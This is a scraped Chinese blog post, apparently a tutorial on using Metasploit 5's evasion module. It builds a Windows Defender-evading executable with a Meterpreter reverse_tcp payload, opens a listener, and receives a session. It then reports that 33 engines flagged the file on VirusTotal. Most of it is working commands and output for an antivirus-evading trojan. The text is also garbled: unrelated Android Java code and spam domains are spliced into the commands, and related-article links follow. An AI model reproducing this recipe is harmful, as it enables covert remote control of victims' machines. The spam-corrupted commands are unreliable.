简介
  
  几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试
  
  操作
  
  首先打开metasploit
  
  msfconsole
  
  你会看到下面这个界面
  
  ➜ ~ msfconsole
  
  This copy of metasploit-framework is more than two weeks old.
  
  Consider running 'msfupdate' to update to the latest version.
  
  .:okOOOkdc' 'cdkOOOko:.
  
  .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
  
  :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
  
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
  
  cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
  
  oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
  
  lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
  
  ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
  
  .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
  
  ,kOl'M.OOOOOOOOOOOOO.M'dOk,
  
  :kk;.OOOOOOOOOOOOO.;Ok:
  
  ;kOOOOOOOOOOOOOOOk:
  
  ,xOOOOOOOOOOOx,
  
  .lOOOOOOOl.
  
  ,dOd,
  
  .
  
  =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
  
  + -- --=[ 1851 exploits - 1046 auxiliary - 321 post ]
  
  + -- --=[ 541 payloads - 44 encoders - 10 nops ]
  
  + -- --=[ 2 evasion ]
  
  + -- --=[ ** This is Metasploit 5 development branch ** ]
  
  之后使用evasion模块,首先看看有什么evasion模块
  
  msf5 > show evasion
  
  evasion
  
  =======
  
  Name Disclosure Date Rank Check Description
  
  ---- --------------- ---- ----- -----------
  
  windows/windows_defender_exe normal No Microsoft Windows Defender Evasive Executable
  
  windows/windows_defender_js_hta normal No Microsoft Windows Defender Evasive JS.Net and HTA
  
  使用windows/windows_defender_exe这个模块
  
  use windows/windows_defender_exe
  
  查看要配置的参数
  
  show options
  
  msf5 evasion(windows/windows_defender_exe) > show options
  
  Module options (evasion/windows/windows_defender_exe):
  
  Name Current Setting Required Description
  
  ---- --------------- -------- -----------
  
  FILENAME oDlIipoP.exe yes Filename for the evasive file (default: random)
  
  Evasion target:
  
  Id Name
  
  @Override
  
  public void onReceive(Context content, Intent intent)
  
  {
  
  String action=intent.getAction(www.dfgjpt.com);
  
  if (actionName.equals(action))
  
  {
  
  String msg=intent.getStringExtra("content");
  
  Toast.makeText(getApplicationContext(www.yongshi123.cn),msg,Toast.LENGTH_SHORT).show();
  
  http://dasheng178.com/#portal/list.html
  
  Intent inten = new Intent("android.intent.action.MAIN");
  
  inten.setComponent(new ComponentName(www.hengtongyoule.com getApplicationContext().getPackageName(), Main2Activity.class.getName()));
  
  intent.addFlags(Intent.FLAG_ACTIVITY_REORDER_TO_FRONT
  
  | Intent.FLAG_ACTIVITY_NEW_TASK
  
  | Intent.FLAG_ACTIVITY_RESET_TASK_IF_NEEDED);
  
  getApplicationContext().startActivity(inten);
  
  }
  
  0 Microsoft Windows
  
  就一个文件名参数可以配置
  
  set FILENAME bboysoul.exe
  
  之后使用reverse_www.dasheng178.com tcp payload
  
  set payload windows/meterpreter/reverse_tcp
  
  设置端口和ip
  
  set LHOST 10.10.10.186
  
  set LPORT 4444
  
  生成木马文件
  
  exploit
  
  之后打开一个监听端口
  
  use multi/handler
  
  设置payload
  
  set payload windows/meterpreter/reverse_tcp
  
  设置主机和端口
  
  set LHOST 10.10.10.186
  
  set LPORT 4444
  
  执行
  
  exploit
  
  接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了
  
  msf5 exploit(multi/handler)www.ysgptvip.com > exploit
  
  [*] Started reverse TCP handler on 10.10.10.186:4444
  
  ^@[*] Sending stage (179779 bytes) to 10.10.10.167
  
  [*] Meterpreter session 1 opened www.meiwanyule.cn/ (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800
  
  上面都是常规操作,之后我们扫描病毒
  
  打开
  
  www.virustotal.com
  
  放入文件扫描
  
  只有33个病毒引擎扫描出来了,说明还可以

使用metasploit中Evasion模块的更多相关文章

  1. Metasploit渗透测试模块(一)

    1.Metasploit模块加载 初始化界面,成功要加载数据库 查看 Metasploit中已近存在的漏洞模块使用 show payloads

  2. metasploit 中的DB

    渗透测试任务中,主机/服务/漏洞等信息如果手动维护,会带来巨大的工作量. 在metasploit中,这部分工作已经被封装的非常好,每次调用内部模块执行的任务结果都会自动存入DB.通过简单的指令即可以方 ...

  3. Kail Linux渗透测试教程之在Metasploit中扫描

    Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...

  4. Metasploit自动攻击模块

    Metasploit自动攻击模块 Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit ...

  5. 了解Metasploit中的Payloads(有效载荷)

    什么是payload? payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等.也有人把payloads称 为shellcode. Shellco ...

  6. 【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控

    文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了 ...

  7. 隐藏进程中的模块绕过IceSword的检测

    标 题: [原创] 隐藏进程中的模块绕过IceSword的检测 作 者: xPLK 时 间: 2008-06-19,17:59:11 链 接: http://bbs.pediy.com/showthr ...

  8. 浅析JS中的模块规范(CommonJS,AMD,CMD)////////////////////////zzzzzz

    浅析JS中的模块规范(CommonJS,AMD,CMD)   如果你听过js模块化这个东西,那么你就应该听过或CommonJS或AMD甚至是CMD这些规范咯,我也听过,但之前也真的是听听而已.     ...

  9. 解决centos7中python-pip模块不存在的问题

    centos 7中python-pip模块不存在,是因为像centos这类衍生的发行版,源跟新滞后,或者不存在.即使使用yum去search python-pip也找不到软件包. 为了使用安装滞后或源 ...

随机推荐

  1. Luogu3352 ZJOI2016 线段树 概率、区间DP

    传送门 考虑对于每一个位置\(i\),计算所有可能的结果出现的概率. 定义一个区间\([l,r]\)为对于\(x\)的极大区间,当且仅当\(\max \limits _{i=l}^r \{a_i\} ...

  2. jQuery webcam plugin

    jQuery webcam plugin The jQuery webcam plugin is a transparent layer to communicate with a camera di ...

  3. c# WPF 设置窗口一直在其中窗口后面/底层窗口

    using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.W ...

  4. WPF 模拟UI 键盘录入

    原文:WPF 模拟UI 键盘录入 版权声明:本文为博主原创文章,未经博主允许不得转载. https://blog.csdn.net/yangyisen0713/article/details/1835 ...

  5. Asp.Net MVC页面显示后台处理进度问题

    这个问题的背景是,用户通过浏览器上传文件或Excel数据到系统中,页面需要时时显示后台处理进度,以增强用户的体验. 在GitHub上找到一个一个项目,基本实现了这个功能,具体效果如下图 代码实现过程大 ...

  6. MonkeyRunner 模块

    用python编写脚本   1.导入模块: MonkeyRunner MonkeyDevice MonkeyImage ps:如果给导入模块起别名,就应该使用别名,而不能使用原名,否则会出现错误. f ...

  7. maven docker 插件集成的几个小坑

    昨晚看springboot视频的时候,发现可以使用docker-maven-plugin这个插件直接build出 docker 镜像到远程服务器上,感觉很方便,于是自己也试了一下,但是碰到了几个问题, ...

  8. Ionic 入门与实战之第二章第二节:Ionic 环境搭建之 Ionic Lab 使用

    原文发表于我的技术博客 本文是「Ionic 入门与实战」系列连载的第二章第二节,主要对 Ionic Lab 工具作了介绍,并讲解了其使用方法,这也是一个开发 Ionic 比较好的调试工具. 原文发表于 ...

  9. 如何设置本机电脑的固定IP地址?

    最近使用Loadrunner需要用到IP欺骗,但是我打开设置IP欺骗却提示我:IP向导不支持启用DHCP的网卡.您的卡启用了DHCP或者配置了无效设置.请与系统管理员联系. 我就方了,于是百度了一下, ...

  10. 理解Liang-Barsky裁剪算法的算法原理

    0.补充知识向量点积:结果等于0, 两向量垂直; 结果大于0, 两向量夹角小于90度; 结果小于0, 两向量夹角大于90度.直线的参数方程:(x1, y1)和(x2, y2)两点确定的直线, 其参数方 ...